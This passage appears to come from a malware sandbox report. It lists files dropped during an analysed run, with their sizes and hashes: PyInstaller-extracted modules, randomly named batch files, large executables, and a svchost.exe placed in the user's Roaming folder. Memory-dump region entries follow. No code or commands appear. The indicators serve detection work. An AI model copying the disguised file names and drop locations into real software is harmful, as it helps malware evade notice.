f150a47a0c4eafbc2b6b430dbabc7eca

SHA1
4a0e652412a56cd1a2406b521feccf6a97b5d6c8

SHA256
31d4a4c94586361d09fbb3c69d3a4849754719c95566fa2c756053de2e00fb29

SHA512
ac2a4ce5ea191909341458cdd11154d99abd73114041fb7a15fc087d1391acc4bf42158ffcd26bff0a97d3eb4a68df8b3a965f4348cf1e97943c6e54ac404bcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32event.pyd

Filesize
18KB

MD5
97cd44dfbf75710efb8225d059262dd0

SHA1
ecc2dfb02b0f3badcaba27da9d9ab606ef1b83a2

SHA256
4f9a394a194d05047a6b4e02e64278637e3c9ac3337c9818a23c9eae75295f74

SHA512
4594df18ce61f5c0e72b912722865b3596137d2ccd3a94df3e25f86074dbc1d67302b1f52f24ce2180cdf808ec649b7b68bd9a758d5245e4bb03848ce2ba5259

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32net.pyd

Filesize
63KB

MD5
f5fe992193cebc8cf526e3c22672c814

SHA1
9209e87fc09e98d8fe8c872306d7c546dfdfaa08

SHA256
91590cf4a0a0655f6c46d5e89646ba92a264b508f0d3b202ca6d54978e322901

SHA512
a00e45da338c8dec8461c916988c0488af66f4540b31dfb4c07bfbd480c904135c4de0816cc12e3c319825bd957fc0d85330302289ca3356f544ae88167ad352

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32process.pyd

Filesize
36KB

MD5
25445faed925f4657043cdeea487bdef

SHA1
e659c7464d905626675c9ecd209dd3e70ed10d76

SHA256
2dd65a8a8c85c4daf4c16dd7f1e12adfbe2e18111a208ef4e01471358cbf4dc3

SHA512
e17acf0714d05db3b4865f6a63a2694000a9b7c4c695af0a93a6ccd28bee3dca9f3844c0458bbce93395daab31b9a92e449f727095c951f7a0eae52593f9162f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32security.pyd

Filesize
106KB

MD5
c7b4b4e558119a29e539dba732c683be

SHA1
62e49cca0b265d5ec56b0274e64c5e0c0845464a

SHA256
2caf1331c77e2c2cecc5e10fad8f5bc71ba8ced1e8bbe1ff89281d8af4e9d75a

SHA512
38e47a74353bd0d5d711113da15b0a6d00b8bbd3e74e416e8c33724dba8e376fe13b1747b57eaa2f595019f9717f1f76c3f45e0d9eec2146165efd62c97b3cd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32service.pyd

Filesize
41KB

MD5
e13134cd2996bae2e9573ea7568a0648

SHA1
fabfc9b7b30408a208a3f1e9e5928e14eadc2fe4

SHA256
fbb43981b5dfb0b7392724831855ac7b9ad4980cd625b0a14ee8b90320ea0b34

SHA512
43827d9dd07570915ab2b63a40d39e1af8b293d19be6e1915b7e8ef47a086ed1b0f7e740ef66f590e3e3c8bde5e575276ede38b9e43439b394ec24e2b154b089

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI14442\win32ts.pyd

Filesize
22KB

MD5
ec45cc5611c0cf5f4e0430f438dc3486

SHA1
4695aaf4f28a40ed0415043ee37a6f5946e12c56

SHA256
2b2bf3a3d1a1175a81416686132cd6ce45c6e7da8969de03fed2e150264ef5fe

SHA512
015c9a58a79ffcedf705ed7bb4761a1f94775928869712fd198c7faee4d4ed0799cef06cec52839bc89a235a644527c354bcd2303359624b88b394f5801958a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nvzz4dyf.od1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fKoYDNBoxPpF.bat

Filesize
207B

MD5
4dadeefca84667728e3159462d48383a

SHA1
d367745f2203bb4840a89d874668e784a38abfbe

SHA256
d5168553fb0bc85f3151d15c978b2875265262e1dfcb4dc0fff37112097c8691

SHA512
8262ecbd3294da38a838a2df1183d259a103fb121019cd25337243bf4904cff8670c3ff96de60b1120b59843336b4649f056b18dc7d49b607736dd2e359544be

Download Submit
C:\Users\Admin\AppData\Local\Temp\iUODShiieUtU.bat

Filesize
207B

MD5
8eeb931cc9eb46f1dacc8115b88f9bd7

SHA1
d195de88989a98b8d054d5e5687a3211759c6b65

SHA256
8317c841725a263c54a781b6b32dd06dd9d2171ad7dcdf16f4c7f8d2bde7c624

SHA512
3d40cc10e2a3480c55ee81d6155c206aa71a8e61162c86ab6dedc126acf3d2334819701ee45d2c519e02786a6271a7f227f9f3f0ae888a3913bd68a2e757dbc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\vO8GlXhROXHb.bat

Filesize
207B

MD5
bf77d89f1b47a33c1f1add229dc3a56f

SHA1
eb1551d483b3673f64e006b8ec6983bf48426792

SHA256
dc1decceca3e4917f1072131f109477040c2c5f4122747de36640ef28e1bbd14

SHA512
7d367800fcb746c098e526d2e34ad64fd462409735098fb953effb5943fe99446d83276930e337ab25f68ef707c596d301209323b73b610c3bcc8ee73973d69c

Download Submit
C:\Users\Admin\AppData\Local\Temp\y5IJKLI6lJTC.bat

Filesize
207B

MD5
c3df0ea72501b9f567166f30bbdd47b4

SHA1
2082805b38736037d2ec424db3dfdb4067a63c7c

SHA256
75e774ab0a8cc13a610a6ba50d8fdf739e53f45bb8840ef268c2d9f25a7fadfa

SHA512
dbb67d506c1700eedc957fe43bc46fd6a2a8fb8c1787badc09c8dfcd670a3659091a34a173fc94722e6b09029be91df63c18e089f59d4c0525122b3a34a6ed32

Download Submit
C:\Users\Admin\AppData\Local\Temp\zFBnMHUIelN7.bat

Filesize
207B

MD5
d409a6a915468017a9899513e4237d8d

SHA1
784bd31cca1ad16ed39747f12128036819ac1f61

SHA256
d183cfe7634bb0079724b62e9c37f372c8ce3d8c124485b3c60fc80a3bc3aaeb

SHA512
6b690995b584ea3e9dbbe00b1a0c8c6010aeb40d29fe5d4e7a7b7c9a002138d77417622367299a52c791d3f773c400f67a75fdd43620067e5cf46aede681e8ae

Download Submit
C:\Users\Admin\AppData\Roaming\ALL slumzick.exe

Filesize
13.9MB

MD5
735bd603cc2800bdb3972cc2b561e86a

SHA1
35178565edc8fcf97812722d3129881f8dd3bc95

SHA256
378dcdf213cb54d381732a1ef5e9881cec416246b0b83c847d5def4017dffa39

SHA512
ff0e9d7433d8003676bedb44432b7e8490b4ec75dfd5f44c4f3a6c0ab9dc083bd0380a4aeccba73fb429455bd49feb99d1d841d5d076c687a8694952a418c575

Download Submit
C:\Users\Admin\AppData\Roaming\All function.exe

Filesize
14.0MB

MD5
a23632476984a0d607dbf76b1096432f

SHA1
47c78ae1d0ff1e3ef1ccc6b229086c355edfffd0

SHA256
ba87298065dec0671a3194454a08f0b3671a78087a4043548b7fcca9e229d8a4

SHA512
a6482876a6b99048acb64ea46b7cfd4adcd55537e7ea25c7cfd353bc57c224336750f5024008832f2eddf1d358da19e7cfac1abac23d21fcd8272313820fbf6c

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
68KB

MD5
6d378d7af71086710318cdda873d9348

SHA1
3d55d27fb66361254d954060904e5ee0b6cd13c1

SHA256
531640277d1dc2206a49f3a69d412cfececc97251247917403a69abf982e492b

SHA512
696b94e8d8fbab051c1db635765dae200caaa631850950d4b39f0ab92b4968eedb3b86888f2e9a54cba6db7667a5ff4087b25f97e6c999a1464e2ad7b87de131

Download Submit
memory/644-594-0x0000000000EB0000-0x0000000000F04000-memory.dmp

Filesize
336KB

Download
memory/872-442-0x0000000000300000-0x0000000000634000-memory.dmp

Filesize
3.2MB

Download
memory/1220-105-0x0000000000400000-0x0000000000516000-memory.dmp

Filesize
1.1MB

Download
memory/1220-109-0x0000000000400000-0x0000000000516000-memory.dmp

Filesize
1.1MB

Download
memory/1436-421-0x0000000000420000-0x0000000000438000-memory.dmp

Filesize
96KB

Download
memory/1736-579-0x0000000000510000-0x000000000052E000-memory.dmp

Filesize
120KB

Download
memory/1948-54-0x00000000008E0000-0x00000000008F0000-memory.dmp

Filesize
64KB

Download
memory/2044-129-0x000000001C920000-0x000000001C970000-memory.dmp

Filesize
320KB

Download
memory/2044-130-0x000000001CA30000-0x000000001CAE2000-memory.dmp

Filesize
712KB

Download
memory/2080-299-0x0000000005B80000-0x0000000005BCC000-memory.dmp

Filesize
304KB

Download
memory/2080-326-0x0000000007950000-0x000000000795A000-memory.dmp

Filesize
40KB

Download
memory/2080-306-0x000000006BF60000-0x000000006BFAC000-memory.dmp

Filesize
304KB

Download
memory/2080-315-0x00000000070F0000-0x000000000710E000-memory.dmp

Filesize
120KB

Download
memory/2080-298-0x0000000005B40000-0x0000000005B5E000-memory.dmp

Filesize
120KB

Download
memory/2080-316-0x0000000007110000-0x00000000071B4000-memory.dmp

Filesize
656KB

Download
memory/2080-317-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/2080-301-0x0000000006070000-0x000000000608A000-memory.dmp

Filesize
104KB

Download
memory/2080-327-0x0000000007AF0000-0x0000000007B01000-memory.dmp

Filesize
68KB

Download
memory/2080-297-0x00000000055E0000-0x0000000005937000-memory.dmp

Filesize
3.3MB

Download
memory/2080-329-0x0000000007B20000-0x0000000007B35000-memory.dmp

Filesize
84KB

Download
memory/2080-330-0x0000000007B60000-0x0000000007B7A000-memory.dmp

Filesize
104KB

Download
memory/2080-300-0x0000000006D30000-0x0000000006DC6000-memory.dmp

Filesize
600KB

Download
memory/2080-331-0x0000000007B50000-0x0000000007B58000-memory.dmp

Filesize
32KB

Download
memory/2080-302-0x00000000060C0000-0x00000000060E2000-memory.dmp

Filesize
136KB

Download
memory/2080-284-0x0000000002680000-0x00000000026B6000-memory.dmp

Filesize
216KB

Download
memory/2080-305-0x00000000070B0000-0x00000000070E4000-memory.dmp

Filesize
208KB

Download
memory/2080-303-0x0000000007380000-0x0000000007926000-memory.dmp

Filesize
5.6MB

Download
memory/2080-328-0x0000000007B10000-0x0000000007B1E000-memory.dmp

Filesize
56KB

Download
memory/2080-285-0x0000000004E60000-0x000000000548A000-memory.dmp

Filesize
6.2MB

Download
memory/2080-288-0x0000000005500000-0x0000000005566000-memory.dmp

Filesize
408KB

Download
memory/2080-287-0x0000000005490000-0x00000000054F6000-memory.dmp

Filesize
408KB

Download
memory/2080-286-0x0000000004DB0000-0x0000000004DD2000-memory.dmp

Filesize
136KB

Download
memory/2092-220-0x000001E4E2EA0000-0x000001E4E2EC2000-memory.dmp

Filesize
136KB

Download
memory/2108-387-0x0000000000E00000-0x0000000001C22000-memory.dmp

Filesize
14.1MB

Download
memory/2172-371-0x0000000000C60000-0x0000000000F84000-memory.dmp

Filesize
3.1MB

Download
memory/2656-332-0x0000000007230000-0x00000000072C2000-memory.dmp

Filesize
584KB

Download
memory/2760-1-0x0000000000920000-0x0000000000928000-memory.dmp

Filesize
32KB

Download
memory/2760-2-0x00000000053A0000-0x000000000543C000-memory.dmp

Filesize
624KB

Download
memory/2760-3-0x00000000744C0000-0x0000000074C71000-memory.dmp

Filesize
7.7MB

Download
memory/2760-4-0x00000000744CE000-0x00000000744CF000-memory.dmp

Filesize
4KB

Download
memory/2760-5-0x00000000744C0000-0x0000000074C71000-memory.dmp

Filesize
7.7MB

Download
memory/2760-0-0x00000000744CE000-0x00000000744CF000-memory.dmp

Filesize
4KB

Download
memory/3252-561-0x0000000000450000-0x0000000000462000-memory.dmp

Filesize
72KB

Download
memory/3276-218-0x00000000004D0000-0x00000000004E0000-memory.dmp

Filesize
64KB

Download
memory/3456-271-0x0000000000EE0000-0x0000000001204000-memory.dmp

Filesize
3.1MB

Download
memory/3544-279-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/3720-466-0x0000025256D60000-0x0000025256D7C000-memory.dmp

Filesize
112KB

Download
memory/3720-464-0x0000025256DA0000-0x0000025256E53000-memory.dmp

Filesize
716KB

Download
memory/3720-468-0x00000252570D0000-0x00000252570EA000-memory.dmp

Filesize
104KB

Download
memory/3720-471-0x00000252570B0000-0x00000252570BA000-memory.dmp

Filesize
40KB

Download
memory/3720-469-0x0000025256D50000-0x0000025256D58000-memory.dmp

Filesize
32KB

Download
memory/3720-467-0x0000025256D40000-0x0000025256D4A000-memory.dmp

Filesize
40KB

Download
memory/3720-470-0x0000025256D80000-0x0000025256D86000-memory.dmp

Filesize
24KB

Download
memory/3720-465-0x0000025256D30000-0x0000025256D3A000-memory.dmp

Filesize
40KB

Download
memory/3720-463-0x0000025256D10000-0x0000025256D2C000-memory.dmp

Filesize
112KB

Download
memory/3928-551-0x00000000026B0000-0x00000000026C2000-memory.dmp

Filesize
72KB

Download
memory/3928-550-0x00000000006E0000-0x00000000006E8000-memory.dmp

Filesize
32KB

Download
memory/4376-122-0x00000000001F0000-0x0000000000514000-memory.dmp

Filesize
3.1MB

Download
memory/4684-623-0x00000000006E0000-0x00000000006F2000-memory.dmp

Filesize
72KB

Download
memory/4720-422-0x0000000000BF0000-0x00000000019FE000-memory.dmp

Filesize
14.1MB

Download
memory/4836-543-0x00000000002C0000-0x00000000005E4000-memory.dmp

Filesize
3.1MB

Download
memory/4972-610-0x0000000000D80000-0x0000000000D88000-memory.dmp

Filesize
32KB

Download
memory/4972-611-0x0000000005700000-0x000000000570A000-memory.dmp

Filesize
40KB

Download